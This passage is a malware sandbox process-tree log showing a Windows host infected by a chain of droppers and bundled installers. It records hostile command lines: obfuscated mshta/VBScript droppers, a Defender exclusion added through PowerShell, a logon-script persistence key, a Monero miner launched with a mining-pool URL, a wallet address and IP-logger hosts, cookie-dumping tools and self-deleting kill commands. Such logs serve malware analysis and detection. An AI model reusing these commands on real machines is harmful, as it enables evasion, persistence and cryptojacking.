C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10784
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10716
-
-
-
-
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3924 -
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exeC:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"2⤵
- Executes dropped EXE
PID:1448 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe") do taskkill -IM "%~nXW" -f4⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu95⤵
- Executes dropped EXE
PID:2648 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )6⤵PID:4752
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f7⤵PID:4816
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE6⤵PID:5908
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "mwEOhluSw0mfDbqmPZCcZKms.exe" -f5⤵
- Kills process with taskkill
PID:3192
-
-
-
-
-
C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"2⤵
- Executes dropped EXE
PID:1800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 7003⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 7043⤵
- Executes dropped EXE
- Program crash
PID:2792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 10843⤵
- Program crash
PID:5168
-
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"2⤵
- Executes dropped EXE
PID:1580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 3883⤵
- Program crash
PID:5672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 4163⤵
- Program crash
PID:6044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 4603⤵
- Program crash
PID:5936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 6243⤵
- Program crash
PID:4816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 6603⤵
- Program crash
PID:2656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 6963⤵
- Program crash
PID:6468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 7243⤵
- Program crash
PID:7016
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"3⤵PID:7860
-
-
-
C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3128
-
-
C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"2⤵
- Executes dropped EXE
PID:2352
-
-
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"2⤵
- Executes dropped EXE
PID:2316 -
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe" -q3⤵
- Executes dropped EXE
PID:5008
-
-
-
C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2692 -
C:\Users\Admin\AppData\Roaming\4335780.exe"C:\Users\Admin\AppData\Roaming\4335780.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Users\Admin\AppData\Roaming\6543320.exe"C:\Users\Admin\AppData\Roaming\6543320.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:696 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:2664
-
-
-
C:\Users\Admin\AppData\Roaming\8663287.exe"C:\Users\Admin\AppData\Roaming\8663287.exe"3⤵
- Executes dropped EXE
PID:1200
-
-
C:\Users\Admin\AppData\Roaming\8052593.exe"C:\Users\Admin\AppData\Roaming\8052593.exe"3⤵
- Executes dropped EXE
PID:4056
-
-
-
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4084 -
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exeC:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe3⤵
- Executes dropped EXE
PID:4936
-
-
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exeC:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
-
C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"2⤵
- Executes dropped EXE
PID:2444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7660669014.exe"3⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\7660669014.exe"C:\Users\Admin\AppData\Local\Temp\7660669014.exe"4⤵PID:5700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0354098227.exe"3⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\0354098227.exe"C:\Users\Admin\AppData\Local\Temp\0354098227.exe"4⤵PID:7496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f & erase "C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe" & exit3⤵PID:6452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f4⤵
- Kills process with taskkill
PID:7232
-
-
-
-
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3396 -
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"3⤵PID:5128
-
-
-
C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"2⤵
- Executes dropped EXE
PID:372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 4803⤵
- Program crash
PID:5264
-
-
-
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"2⤵
- Executes dropped EXE
PID:3896 -
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"3⤵PID:3284
-
-
-
C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"2⤵
- Executes dropped EXE
PID:3952
-
-
C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"2⤵
- Executes dropped EXE
PID:1920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 7603⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 8123⤵
- Program crash
PID:6016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 7843⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 8243⤵
- Program crash
PID:2164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 9563⤵
- Program crash
PID:1136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 9843⤵
- Program crash
PID:5744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 10163⤵
- Program crash
PID:6308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 13443⤵
- Program crash
PID:6556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 13683⤵
- Program crash
PID:6832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 14123⤵
- Program crash
PID:6628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 15003⤵
- Program crash
PID:7528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 9003⤵
- Program crash
PID:8144
-
-
-
C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"2⤵
- Executes dropped EXE
PID:2180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f & erase "C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe" & exit3⤵PID:5192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f4⤵
- Kills process with taskkill
PID:5444
-
-
-
-
C:\Users\Admin\Documents\dAmLdVeL5Xdxup5rhoQ_CCty.exe"C:\Users\Admin\Documents\dAmLdVeL5Xdxup5rhoQ_CCty.exe"2⤵
- Executes dropped EXE
PID:960 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\DAMLDV~1.DLL,s C:\Users\Admin\DOCUME~1\DAMLDV~1.EXE3⤵PID:7408
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\DAMLDV~1.DLL,QiMfMnVr4⤵PID:1860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\DAMLDV~1.DLL5⤵PID:6600
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\DAMLDV~1.DLL,fiZXTUhYMlFl5⤵PID:6352
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵PID:4228
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:4128
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp1B26.tmp.ps1"5⤵PID:5272
-
-
-
-
-
C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"2⤵
- Executes dropped EXE
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\is-EC0MG.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp"C:\Users\Admin\AppData\Local\Temp\is-EC0MG.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp" /SL5="$2021C,138429,56832,C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"3⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\is-A9DUD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-A9DUD.tmp\Setup.exe" /Verysilent4⤵PID:5372
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\is-5FUKG.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-5FUKG.tmp\Stats.tmp" /SL5="$50060,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\is-Q6MPV.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-Q6MPV.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵PID:5652
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:5724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 7566⤵
- Program crash
PID:1812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 8086⤵
- Program crash
PID:6240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 8126⤵
- Program crash
PID:6240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 8206⤵
- Program crash
PID:7456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 9526⤵
- Program crash
PID:6296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 9886⤵
- Program crash
PID:8012
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-3S246.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-3S246.tmp\Inlog.tmp" /SL5="$20234,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\is-GS6FP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GS6FP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\is-Q6AIP.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q6AIP.tmp\Setup.tmp" /SL5="$60050,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-GS6FP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:3568
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-C8N4V.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:4676
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-C8N4V.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵PID:192
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:9836
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:7224
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\is-C8N4V.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-C8N4V.tmp\{app}\vdi_compiler"9⤵PID:1064
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-C8N4V.tmp\{app}\vdi_compiler.exe"10⤵PID:9712
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:8352
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:11220
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\is-OHM1E.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-OHM1E.tmp\WEATHER Manager.tmp" /SL5="$3019E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\is-UGFRB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UGFRB.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵PID:7664
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-UGFRB.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-UGFRB.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:9344
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\is-MJB90.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-MJB90.tmp\VPN.tmp" /SL5="$5004E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\is-1L4S5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1L4S5.tmp\Setup.exe" /silent /subid=7207⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\is-MFQU9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MFQU9.tmp\Setup.tmp" /SL5="$2031C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1L4S5.tmp\Setup.exe" /silent /subid=7208⤵PID:1372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:8772
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:8208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:6868
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:7648
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:2444
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:2180
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:6052
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵PID:1824
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:6120
-
C:\Users\Admin\Documents\J98wdwN8OiPawiRTl7XZAljK.exe"C:\Users\Admin\Documents\J98wdwN8OiPawiRTl7XZAljK.exe"6⤵PID:6776
-
-
C:\Users\Admin\Documents\q6NUS41zpulso5CBnPlRRzmL.exe"C:\Users\Admin\Documents\q6NUS41zpulso5CBnPlRRzmL.exe"6⤵PID:6084
-
-
C:\Users\Admin\Documents\kPgpkUoAJR5srg49QAqdHKPi.exe"C:\Users\Admin\Documents\kPgpkUoAJR5srg49QAqdHKPi.exe"6⤵PID:6104
-
-
C:\Users\Admin\Documents\ZqQWDDoJGkKHBoC7Y5CvHhju.exe"C:\Users\Admin\Documents\ZqQWDDoJGkKHBoC7Y5CvHhju.exe"6⤵PID:6876
-
-
C:\Users\Admin\Documents\TRXvAAa6ecMdmt4RiASgtqKu.exe"C:\Users\Admin\Documents\TRXvAAa6ecMdmt4RiASgtqKu.exe"6⤵PID:6996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 4807⤵
- Program crash
PID:864
-
-
-
